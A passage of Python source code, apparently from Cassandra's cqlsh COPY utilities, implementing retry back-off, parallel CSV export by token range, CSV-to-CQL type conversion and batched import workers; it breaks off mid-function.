class ExpBackoffRetryPolicy(RetryPolicy):
"""
A retry policy with exponential back-off for read timeouts and write timeouts
"""
def __init__(self, parent_process):
RetryPolicy.__init__(self)
self.max_attempts = parent_process.max_attempts
def on_read_timeout(self, query, consistency, required_responses,
received_responses, data_retrieved, retry_num):
return self._handle_timeout(consistency, retry_num)
def on_write_timeout(self, query, consistency, write_type,
required_responses, received_responses, retry_num):
return self._handle_timeout(consistency, retry_num)
def _handle_timeout(self, consistency, retry_num):
delay = self.backoff(retry_num)
if delay > 0:
printdebugmsg("Timeout received, retrying after %d seconds" % (delay,))
time.sleep(delay)
return self.RETRY, consistency
elif delay == 0:
printdebugmsg("Timeout received, retrying immediately")
return self.RETRY, consistency
else:
printdebugmsg("Timeout received, giving up after %d attempts" % (retry_num + 1))
return self.RETHROW, None
def backoff(self, retry_num):
"""
Perform exponential back-off up to a maximum number of times, where
this maximum is per query.
To back-off we should wait a random number of seconds
between 0 and 2^c - 1, where c is the number of total failures.
:return : the number of seconds to wait for, -1 if we should not retry
"""
if retry_num >= self.max_attempts:
return -1
delay = randint(0, pow(2, retry_num + 1) - 1)
return delay
class ExportSession(object):
"""
A class for connecting to a cluster and storing the number
of requests that this connection is processing. It wraps the methods
for executing a query asynchronously and for shutting down the
connection to the cluster.
"""
def __init__(self, cluster, export_process):
session = cluster.connect(export_process.ks)
session.row_factory = tuple_factory
session.default_fetch_size = export_process.options.copy['pagesize']
session.default_timeout = export_process.options.copy['pagetimeout']
printdebugmsg("Created connection to %s with page size %d and timeout %d seconds per page"
% (cluster.contact_points, session.default_fetch_size, session.default_timeout))
self.cluster = cluster
self.session = session
self.requests = 1
self.lock = threading.Lock()
self.consistency_level = export_process.consistency_level
def add_request(self):
with self.lock:
self.requests += 1
def complete_request(self):
with self.lock:
self.requests -= 1
def num_requests(self):
with self.lock:
return self.requests
def execute_async(self, query):
return self.session.execute_async(SimpleStatement(query, consistency_level=self.consistency_level))
def shutdown(self):
self.cluster.shutdown()
class ExportProcess(ChildProcess):
"""
An child worker process for the export task, ExportTask.
"""
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
options = params['options']
self.float_precision = options.copy['floatprecision']
self.double_precision = options.copy['doubleprecision']
self.nullval = options.copy['nullval']
self.max_requests = options.copy['maxrequests']
self.hosts_to_sessions = dict()
self.formatters = dict()
self.options = options
def run(self):
if self.coverage:
self.start_coverage()
try:
self.inner_run()
finally:
if self.coverage:
self.stop_coverage()
self.close()
def inner_run(self):
"""
The parent sends us (range, info) on the inbound queue (inmsg)
in order to request us to process a range, for which we can
select any of the hosts in info, which also contains other information for this
range such as the number of attempts already performed. We can signal errors
on the outbound queue (outmsg) by sending (range, error) or
we can signal a global error by sending (None, error).
We terminate when the inbound queue is closed.
"""
self.on_fork()
while True:
if self.num_requests() > self.max_requests:
time.sleep(0.001) # 1 millisecond
continue
token_range, info = self.inmsg.recv()
self.start_request(token_range, info)
@staticmethod
def get_error_message(err, print_traceback=False):
if isinstance(err, str):
msg = err
elif isinstance(err, BaseException):
msg = "%s - %s" % (err.__class__.__name__, err)
if print_traceback and sys.exc_info()[1] == err:
traceback.print_exc()
else:
msg = str(err)
return msg
def report_error(self, err, token_range):
msg = self.get_error_message(err, print_traceback=self.debug)
printdebugmsg(msg)
self.send((token_range, Exception(msg)))
def send(self, response):
self.outmsg.send(response)
def start_request(self, token_range, info):
"""
Begin querying a range by executing an async query that
will later on invoke the callbacks attached in attach_callbacks.
"""
session = self.get_session(info['hosts'], token_range)
if session:
metadata = session.cluster.metadata.keyspaces[self.ks].tables[self.table]
query = self.prepare_query(metadata.partition_key, token_range, info['attempts'])
future = session.execute_async(query)
self.attach_callbacks(token_range, future, session)
def num_requests(self):
return sum(session.num_requests() for session in list(self.hosts_to_sessions.values()))
def get_session(self, hosts, token_range):
"""
We return a session connected to one of the hosts passed in, which are valid replicas for
the token range. We sort replicas by favouring those without any active requests yet or with the
smallest number of requests. If we fail to connect we report an error so that the token will
be retried again later.
:return: An ExportSession connected to the chosen host.
"""
# sorted replicas favouring those with no connections yet
hosts = sorted(hosts,
key=lambda hh: 0 if hh not in self.hosts_to_sessions else self.hosts_to_sessions[hh].requests)
errors = []
ret = None
for host in hosts:
try:
ret = self.connect(host)
except Exception as e:
errors.append(self.get_error_message(e))
if ret:
if errors:
printdebugmsg("Warning: failed to connect to some replicas: %s" % (errors,))
return ret
self.report_error("Failed to connect to all replicas %s for %s, errors: %s" % (hosts, token_range, errors),
token_range)
return None
def connect(self, host):
if host in list(self.hosts_to_sessions.keys()):
session = self.hosts_to_sessions[host]
session.add_request()
return session
new_cluster = Cluster(
contact_points=(host,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
ssl_options=ssl_settings(host, self.config_file) if self.ssl else None,
load_balancing_policy=WhiteListRoundRobinPolicy([host]),
default_retry_policy=ExpBackoffRetryPolicy(self),
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0)
session = ExportSession(new_cluster, self)
self.hosts_to_sessions[host] = session
return session
def attach_callbacks(self, token_range, future, session):
metadata = session.cluster.metadata
ks_meta = metadata.keyspaces[self.ks]
table_meta = ks_meta.tables[self.table]
cql_types = [CqlType(table_meta.columns[c].cql_type, ks_meta) for c in self.columns]
def result_callback(rows):
if future.has_more_pages:
future.start_fetching_next_page()
self.write_rows_to_csv(token_range, rows, cql_types)
else:
self.write_rows_to_csv(token_range, rows, cql_types)
self.send((None, None))
session.complete_request()
def err_callback(err):
self.report_error(err, token_range)
session.complete_request()
future.add_callbacks(callback=result_callback, errback=err_callback)
def write_rows_to_csv(self, token_range, rows, cql_types):
if not rows:
return # no rows in this range
try:
output = StringIO() if six.PY3 else BytesIO()
writer = csv.writer(output, **self.options.dialect)
for row in rows:
writer.writerow(list(map(self.format_value, row, cql_types)))
data = (output.getvalue(), len(rows))
self.send((token_range, data))
output.close()
except Exception as e:
self.report_error(e, token_range)
def format_value(self, val, cqltype):
if val is None or val == EMPTY:
return format_value_default(self.nullval, colormap=NO_COLOR_MAP)
formatter = self.formatters.get(cqltype, None)
if not formatter:
formatter = get_formatter(val, cqltype)
self.formatters[cqltype] = formatter
if not hasattr(cqltype, 'precision'):
cqltype.precision = self.double_precision if cqltype.type_name == 'double' else self.float_precision
formatted = formatter(val, cqltype=cqltype,
encoding=self.encoding, colormap=NO_COLOR_MAP, date_time_format=self.date_time_format,
float_precision=cqltype.precision, nullval=self.nullval, quote=False,
decimal_sep=self.decimal_sep, thousands_sep=self.thousands_sep,
boolean_styles=self.boolean_styles)
return formatted if six.PY3 else formatted.encode('utf8')
def close(self):
ChildProcess.close(self)
for session in list(self.hosts_to_sessions.values()):
session.shutdown()
def prepare_query(self, partition_key, token_range, attempts):
"""
Return the export query or a fake query with some failure injected.
"""
if self.test_failures:
return self.maybe_inject_failures(partition_key, token_range, attempts)
else:
return self.prepare_export_query(partition_key, token_range)
def maybe_inject_failures(self, partition_key, token_range, attempts):
"""
Examine self.test_failures and see if token_range is either a token range
supposed to cause a failure (failing_range) or to terminate the worker process
(exit_range). If not then call prepare_export_query(), which implements the
normal behavior.
"""
start_token, end_token = token_range
if not start_token or not end_token:
# exclude first and last ranges to make things simpler
return self.prepare_export_query(partition_key, token_range)
if 'failing_range' in self.test_failures:
failing_range = self.test_failures['failing_range']
if start_token >= failing_range['start'] and end_token <= failing_range['end']:
if attempts < failing_range['num_failures']:
return 'SELECT * from bad_table'
if 'exit_range' in self.test_failures:
exit_range = self.test_failures['exit_range']
if start_token >= exit_range['start'] and end_token <= exit_range['end']:
sys.exit(1)
return self.prepare_export_query(partition_key, token_range)
def prepare_export_query(self, partition_key, token_range):
"""
Return a query where we select all the data for this token range
"""
pk_cols = ", ".join(protect_names(col.name for col in partition_key))
columnlist = ', '.join(protect_names(self.columns))
start_token, end_token = token_range
query = 'SELECT %s FROM %s.%s' % (columnlist, protect_name(self.ks), protect_name(self.table))
if start_token is not None or end_token is not None:
query += ' WHERE'
if start_token is not None:
query += ' token(%s) > %s' % (pk_cols, start_token)
if start_token is not None and end_token is not None:
query += ' AND'
if end_token is not None:
query += ' token(%s) <= %s' % (pk_cols, end_token)
return query
class ParseError(Exception):
""" We failed to parse an import record """
pass
class ImmutableDict(frozenset):
"""
Immutable dictionary implementation to represent map types.
We need to pass BoundStatement.bind() a dict() because it calls iteritems(),
except we can't create a dict with another dict as the key, hence we use a class
that adds iteritems to a frozen set of tuples (which is how dict are normally made
immutable in python).
Must be declared in the top level of the module to be available for pickling.
"""
iteritems = frozenset.__iter__
def items(self):
for k, v in self.iteritems():
yield k, v
class ImportConversion(object):
"""
A class for converting strings to values when importing from csv, used by ImportProcess,
the parent.
"""
def __init__(self, parent, table_meta, statement=None):
self.ks = parent.ks
self.table = parent.table
self.columns = parent.valid_columns
self.nullval = parent.nullval
self.decimal_sep = parent.decimal_sep
self.thousands_sep = parent.thousands_sep
self.boolean_styles = parent.boolean_styles
self.date_time_format = parent.date_time_format.timestamp_format
self.debug = parent.debug
self.encoding = parent.encoding
self.table_meta = table_meta
self.primary_key_indexes = [self.columns.index(col.name) for col in self.table_meta.primary_key]
self.partition_key_indexes = [self.columns.index(col.name) for col in self.table_meta.partition_key]
if statement is None:
self.use_prepared_statements = False
statement = self._get_primary_key_statement(parent, table_meta)
else:
self.use_prepared_statements = True
self.is_counter = parent.is_counter(table_meta)
self.proto_version = statement.protocol_version
# the cql types and converters for the prepared statement, either the full statement or only the primary keys
self.cqltypes = [c.type for c in statement.column_metadata]
self.converters = [self._get_converter(c.type) for c in statement.column_metadata]
# the cql types for the entire statement, these are the same as the types above but
# only when using prepared statements
self.coltypes = [table_meta.columns[name].cql_type for name in parent.valid_columns]
# these functions are used for non-prepared statements to protect values with quotes if required
self.protectors = [self._get_protector(t) for t in self.coltypes]
@staticmethod
def _get_protector(t):
if t in ('ascii', 'text', 'timestamp', 'date', 'time', 'inet'):
return lambda v: protect_value(v)
else:
return lambda v: v
@staticmethod
def _get_primary_key_statement(parent, table_meta):
"""
We prepare a query statement to find out the types of the partition key columns so we can
route the update query to the correct replicas. As far as I understood this is the easiest
way to find out the types of the partition columns, we will never use this prepared statement
"""
where_clause = ' AND '.join(['%s = ?' % (protect_name(c.name)) for c in table_meta.partition_key])
select_query = 'SELECT * FROM %s.%s WHERE %s' % (protect_name(parent.ks),
protect_name(parent.table),
where_clause)
return parent.session.prepare(ensure_str(select_query))
@staticmethod
def unprotect(v):
if v is not None:
return CqlRuleSet.dequote_value(v)
def _get_converter(self, cql_type):
"""
Return a function that converts a string into a value the can be passed
into BoundStatement.bind() for the given cql type. See cassandra.cqltypes
for more details.
"""
unprotect = self.unprotect
def convert(t, v):
v = unprotect(v)
if v == self.nullval:
return self.get_null_val()
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_mandatory(t, v):
v = unprotect(v)
# we can't distinguish between empty strings and null values in csv. Null values are not supported in
# collections, so it must be an empty string.
if v == self.nullval and not issubclass(t, VarcharType):
raise ParseError('Empty values are not allowed')
return converters.get(t.typename, convert_unknown)(v, ct=t)
def convert_blob(v, **_):
if sys.version_info.major >= 3:
return bytes.fromhex(v[2:])
else:
return BlobType(v[2:].decode("hex"))
def convert_text(v, **_):
return ensure_str(v)
def convert_uuid(v, **_):
return UUID(v)
def convert_bool(v, **_):
return True if v.lower() == ensure_str(self.boolean_styles[0]).lower() else False
def get_convert_integer_fcn(adapter=int):
"""
Return a slow and a fast integer conversion function depending on self.thousands_sep
"""
if self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, ensure_str('')))
else:
return lambda v, ct=cql_type: adapter(v)
def get_convert_decimal_fcn(adapter=float):
"""
Return a slow and a fast decimal conversion function depending on self.thousands_sep and self.decimal_sep
"""
empty_str = ensure_str('')
dot_str = ensure_str('.')
if self.thousands_sep and self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str).replace(self.decimal_sep, dot_str))
elif self.thousands_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.thousands_sep, empty_str))
elif self.decimal_sep:
return lambda v, ct=cql_type: adapter(v.replace(self.decimal_sep, dot_str))
else:
return lambda v, ct=cql_type: adapter(v)
def split(val, sep=','):
"""
Split "val" into a list of values whenever the separator "sep" is found, but
ignore separators inside parentheses or single quotes, except for the two
outermost parentheses, which will be ignored. This method is called when parsing composite
types, "val" should be at least 2 characters long, the first char should be an
open parenthesis and the last char should be a matching closing parenthesis. We could also
check exactly which parenthesis type depending on the caller, but I don't want to enforce
too many checks that don't necessarily provide any additional benefits, and risk breaking
data that could previously be imported, even if strictly speaking it is incorrect CQL.
For example, right now we accept sets that start with '[' and ']', I don't want to break this
by enforcing '{' and '}' in a minor release.
"""
def is_open_paren(cc):
return cc == '{' or cc == '[' or cc == '('
def is_close_paren(cc):
return cc == '}' or cc == ']' or cc == ')'
def paren_match(c1, c2):
return (c1 == '{' and c2 == '}') or (c1 == '[' and c2 == ']') or (c1 == '(' and c2 == ')')
if len(val) < 2 or not paren_match(val[0], val[-1]):
raise ParseError('Invalid composite string, it should start and end with matching parentheses: {}'
.format(val))
ret = []
last = 1
level = 0
quote = False
for i, c in enumerate(val):
if c == '\'':
quote = not quote
elif not quote:
if is_open_paren(c):
level += 1
elif is_close_paren(c):
level -= 1
elif c == sep and level == 1:
ret.append(val[last:i])
last = i + 1
else:
if last < len(val) - 1:
ret.append(val[last:-1])
return ret
# this should match all possible CQL and CQLSH datetime formats
p = re.compile(r"(\d{4})\-(\d{2})\-(\d{2})\s?(?:'T')?" # YYYY-MM-DD[( |'T')]
+ r"(?:(\d{2}):(\d{2})(?::(\d{2})(?:\.(\d{1,6}))?))?" # [HH:MM[:SS[.NNNNNN]]]
+ r"(?:([+\-])(\d{2}):?(\d{2}))?") # [(+|-)HH[:]MM]]
def convert_datetime(val, **_):
try:
if six.PY2:
# Python 2 implementation
tval = time.strptime(val, self.date_time_format)
return timegm(tval) * 1e3 # scale seconds to millis for the raw value
else:
# Python 3 implementation
dtval = datetime.datetime.strptime(val, self.date_time_format)
return dtval.timestamp() * 1000
except ValueError:
pass # if it's not in the default format we try CQL formats
m = p.match(val)
if not m:
try:
# in case of overflow COPY TO prints dates as milliseconds from the epoch, see
# deserialize_date_fallback_int in cqlsh.py
return int(val)
except ValueError:
raise ValueError("can't interpret %r as a date with format %s or as int" % (val,
self.date_time_format))
# https://docs.python.org/3/library/time.html#time.struct_time
tval = time.struct_time((int(m.group(1)), int(m.group(2)), int(m.group(3)), # year, month, day
int(m.group(4)) if m.group(4) else 0, # hour
int(m.group(5)) if m.group(5) else 0, # minute
int(m.group(6)) if m.group(6) else 0, # second
0, 1, -1)) # day of week, day of year, dst-flag
# convert sub-seconds (a number between 1 and 6 digits) to milliseconds
milliseconds = 0 if not m.group(7) else int(m.group(7)) * pow(10, 3 - len(m.group(7)))
if m.group(8):
offset = (int(m.group(9)) * 3600 + int(m.group(10)) * 60) * int(m.group(8) + '1')
else:
offset = -time.timezone
# scale seconds to millis for the raw value
return ((timegm(tval) + offset) * 1000) + milliseconds
def convert_date(v, **_):
return Date(v)
def convert_time(v, **_):
return Time(v)
def convert_tuple(val, ct=cql_type):
return tuple(convert_mandatory(t, v) for t, v in zip(ct.subtypes, split(val)))
def convert_list(val, ct=cql_type):
return tuple(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_set(val, ct=cql_type):
return frozenset(convert_mandatory(ct.subtypes[0], v) for v in split(val))
def convert_map(val, ct=cql_type):
"""
See ImmutableDict above for a discussion of why a special object is needed here.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
return ImmutableDict(frozenset((convert_mandatory(ct.subtypes[0], v[0]), convert(ct.subtypes[1], v[1]))
for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]))
def convert_user_type(val, ct=cql_type):
"""
A user type is a dictionary except that we must convert each key into
an attribute, so we are using named tuples. It must also be hashable,
so we cannot use dictionaries. Maybe there is a way to instantiate ct
directly but I could not work it out.
Also note that it is possible that the subfield names in the csv are in the
wrong order, so we must sort them according to ct.fieldnames, see CASSANDRA-12959.
"""
split_format_str = ensure_str('{%s}')
sep = ensure_str(':')
vals = [v for v in [split(split_format_str % vv, sep=sep) for vv in split(val)]]
dict_vals = dict((unprotect(v[0]), v[1]) for v in vals)
sorted_converted_vals = [(n, convert(t, dict_vals[n]) if n in dict_vals else self.get_null_val())
for n, t in zip(ct.fieldnames, ct.subtypes)]
ret_type = namedtuple(ct.typename, [v[0] for v in sorted_converted_vals])
return ret_type(*tuple(v[1] for v in sorted_converted_vals))
def convert_single_subtype(val, ct=cql_type):
return converters.get(ct.subtypes[0].typename, convert_unknown)(val, ct=ct.subtypes[0])
def convert_unknown(val, ct=cql_type):
if issubclass(ct, UserType):
return convert_user_type(val, ct=ct)
elif issubclass(ct, ReversedType):
return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=int),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=int),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else (ensure_str("0") if self.is_counter else ensure_str("NULL"))
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
protection functions to escape values with quotes when required. Also check on the row length and
make sure primary partition key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception as e:
# if we could not convert an empty string, then self.nullval has been set to a marker
# because the user needs to import empty strings, except that the converters for some types
# will fail to convert an empty string, in this case the null value should be inserted
# see CASSANDRA-12794
if v == '':
return self.get_null_val()
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (v, e.message if hasattr(e, 'message') else str(e)))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
# Note that refresh metadata is disabled by default and we currenlty do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return [r for r in shuffled if r.is_up is not False and r.datacenter == self.local_dc] if hosts else ()
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if too many in flight requests to all replicas are already in progress.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in range(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
# the back-off starts at 10 ms (0.01) and it can go up to to 2^max_backoff_attempts,
# which is currently 12, so 2^12 = 4096 = ~40 seconds when dividing by 0.01
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.request_timeout = options.copy['requesttimeout']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = self.request_timeout
return self._session
def run(self):
if self.coverage:
self.start_coverage()
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
self.report_error(exc)
finally:
if self.coverage:
self.stop_coverage()
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
query = ensure_str(query)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
Main run method. Note that we bind self methods that are called inside loops
for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
# do not handle else case, if a statement could not be created, the exception is handled
# in self.wrap_make_statement and the error is reported, if a failure is injected that
# causes the statement to be None, then we should not report the error so that we can test
# the parent process handling missing batches from child processes
except Exception as exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception as exc:
print("Failed to make batch statement: {}".format(exc))
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch, apply_failure = self.maybe_inject_failures(batch)
if apply_failure:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append(ensure_text("{}={}").format(self.valid_columns[i], ensure_text(value)))
else:
set_clause.append(ensure_text("{}={}+{}").format(self.valid_columns[i], self.valid_columns[i], ensure_text(value)))
full_query_text = query % (ensure_text(',').join(set_clause), ensure_text(' AND ').join(where_clause))
statement.add(ensure_str(full_query_text))
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
field_sep = b',' if six.PY2 else ','
statement._statements_and_parameters = [(False, query % (field_sep.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
